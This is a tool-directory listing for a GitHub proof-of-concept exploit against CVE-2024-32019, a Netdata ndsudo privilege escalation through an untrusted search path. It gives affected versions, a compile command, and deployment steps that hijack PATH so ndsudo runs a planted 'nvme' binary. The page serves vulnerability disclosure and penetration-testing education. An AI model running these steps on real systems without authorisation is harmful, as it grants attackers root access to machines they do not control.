Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
Privilege EscalationExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

Proof-of-concept exploit for CVE-2024-32019 demonstrating local privilege escalation via untrusted search path in Netdata's ndsudo plugin. Includes compile instructions and deployment steps.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
5281 year agoNot yet reviewed

⚠️ CVE-2024-32019 - PoC

📌 Affected Versions

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ Proof of Concept

CVE-2024-32019 — ndsudo local privilege escalation via untrusted search path.

🔧 Compile the Exploit

x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 Deploy on Target Machine

  1. Transfer the compiled binary to the vulnerable machine.

  2. Make it executable:

    chmod +x nvme
    
  3. Exploit the vulnerable binary via PATH manipulation (use the same path where you uploaded your binary):

    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 Reference

  • Netdata Security Advisory - GHSA-pmhq-4cxq-wj93

⚖️ Disclaimer and Terms

This Proof of Concept (PoC) code is provided for educational and authorized penetration testing purposes only.

  • No permission is granted to modify, redistribute, or use this code for any other purposes.
  • Unauthorized use or modification may be illegal and unethical.
  • The authors take no responsibility for any misuse or damages.
Download Tool